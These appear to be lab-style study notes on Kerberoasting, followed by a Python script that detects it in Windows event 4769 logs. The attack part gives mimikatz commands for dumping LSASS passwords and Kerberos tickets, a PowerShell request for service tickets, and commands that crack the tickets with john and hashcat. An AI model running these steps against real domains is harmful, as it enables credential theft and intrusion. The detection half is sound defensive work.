Creating & Cracking TGS

There are a couple of weak points through which the Kerberos authentication process can be hijacked to reveal sensitive information.

Cached Credentials

The user password is kept in system memory so that a TGT can be renewed from a domain controller. It is held by the Local Security Authority Subsystem Service (LSASS), and there is no straightforward method to retrieve it.

SYSTEM or local administrator privileges are required to gain access to the hashes stored on a target.

We can use the mimikatz.exe tool to extract this information:

mimikatz.exe

privilege::debug #elevate the privilege

sekurlsa::logonpasswords #list the logon passwords

These commands list the users along with their passwords in various hash formats depending on the AD configuration; NTLM or WDigest may be in use.

Listing TGT & Service Tickets

Just as with passwords, we can also retrieve TGTs or service tickets using mimikatz:

mimikatz.exe

privilege::debug #elevate the privilege

sekurlsa::tickets #All the tickets

In order to download the tickets, the user of that system must already have requested them from the TGS. Where no tickets have been requested yet, a fresh request can be made and the resulting ticket downloaded:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'HTTP/PWebserver.particle42.com'

Using the above commands in PowerShell we can request a ticket for any SPN. The tickets can then be exported to files using the following command within mimikatz:

kerberos::list /export

The exported .kirbi files can be cracked using the kerberoast toolkit:

python /usr/share/kerberoast/tgsrepcrack.py rockyou.txt HTTP~PWebServer.particle42.com-CORP.COM.kirbi

Alternatively, the files can be cracked with john or hashcat using the following commands:

John

python3 kirbi2john.py -o http_corp.john HTTP_Corp.kirbi #convert to john format
john --wordlist=pass.txt http_corp.john

Hashcat

Ensure that the ticket hash is in hashcat format before cracking (mode 13100 is Kerberos 5 TGS-REP etype 23, i.e. RC4-HMAC tickets):

hashcat -m 13100 http_corp_hashcat.hash pass.txt
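As the defensive counterpart to the service-ticket requests above, here is an added example (not from these notes) of detection logic run over constructed Security event 4769 records: it flags service tickets issued with RC4-HMAC (etype 0x17, the ticket type hashcat mode 13100 is built for) and accounts that request tickets for several distinct SPNs in a short window. The flattened one-line log layout and all sample values are assumptions made for the example; the field names follow the 4769 event's own XML fields.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4769 (TGS request) records, flattened to
# one key=value line each. Made up for this example, not real logs.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01 EventID=4769 TargetUserName=alice@CORP.COM ServiceName=HTTP/PWebserver.particle42.com TicketEncryptionType=0x12 IpAddress=10.0.0.5
2024-05-01T10:00:02 EventID=4769 TargetUserName=bob@CORP.COM ServiceName=MSSQLSvc/db01.corp.com TicketEncryptionType=0x17 IpAddress=10.0.0.9
2024-05-01T10:00:03 EventID=4769 TargetUserName=bob@CORP.COM ServiceName=HTTP/PWebserver.particle42.com TicketEncryptionType=0x17 IpAddress=10.0.0.9
2024-05-01T10:00:04 EventID=4769 TargetUserName=bob@CORP.COM ServiceName=CIFS/fs01.corp.com TicketEncryptionType=0x17 IpAddress=10.0.0.9
2024-05-01T10:00:05 EventID=4769 TargetUserName=bob@CORP.COM ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.0.0.9
2024-05-01T10:30:00 EventID=4769 TargetUserName=dave@CORP.COM ServiceName=HTTP/PWebserver.particle42.com TicketEncryptionType=0x17 IpAddress=10.0.0.11
"""

FIELD = re.compile(r"(\w+)=(\S+)")
RC4_HMAC = "0x17"  # etype 23: the ticket type hashcat mode 13100 is for

def parse_events(text):
    """Flattened lines -> dicts, keeping only 4769 and dropping TGT renewals."""
    events = []
    for line in text.splitlines():
        ts, _, rest = line.partition(" ")
        ev = dict(FIELD.findall(rest))
        ev["time"] = datetime.fromisoformat(ts)
        if ev.get("EventID") == "4769" and ev["ServiceName"] != "krbtgt":
            events.append(ev)
    return events

def rc4_service_tickets(events):
    """Service tickets issued with RC4-HMAC. Where service accounts support
    AES, an RC4 request is the classic Kerberoasting indicator."""
    return [ev for ev in events if ev["TicketEncryptionType"] == RC4_HMAC]

def burst_requesters(events, window=timedelta(minutes=5), min_spns=3):
    """Accounts requesting tickets for many distinct SPNs within one window,
    the pattern left by bulk SPN harvesting whatever the encryption type."""
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_user[ev["TargetUserName"]].append(ev)
    flagged = {}
    for user, evs in by_user.items():
        for i, first in enumerate(evs):
            spns = {e["ServiceName"] for e in evs[i:]
                    if e["time"] - first["time"] <= window}
            if len(spns) >= min_spns:
                flagged[user] = len(spns)
                break
    return flagged
```

Tune the window and SPN threshold to the domain's normal traffic, and pair the RC4 rule with a check that the affected service accounts actually have AES keys, otherwise every legacy client will trip it.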
